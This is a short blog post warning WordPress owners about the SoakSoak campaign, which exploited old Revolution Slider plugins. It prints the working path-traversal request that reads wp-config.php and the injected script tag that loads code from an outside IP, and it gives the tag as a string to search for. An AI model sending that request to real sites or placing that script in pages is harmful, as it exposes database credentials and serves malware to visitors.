Russian Hacker Group? SoakSoak.ru malicious site & code injections

SoakSoak will serve pages that attempt to infiltrate your users' computers, stealing their data!
SoakSoak will serve pages that attempt to infiltrate your users' computers, stealing their data!

Last week, Wordpress sites worldwide were hacked with the following simple line of code:

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Let's not go into details here and now, but if you have an old version of the "Revolution Slider" installed you better grep around for the following string:

<script language="JavaScript" src="http://122.155.168.105/ads/inpage/pub/collect.js" type="text/javascript"></script>

...and if you find it, check with Google Webmaster Tools to see if your site has been flagged for malicious content. Chances are your site is causing people to have their personal information stolen and fed to unsavory characters.

http://blog.sucuri.net/2014/12/soaksoak-payload-analysis-evolution-of-co...

Tags: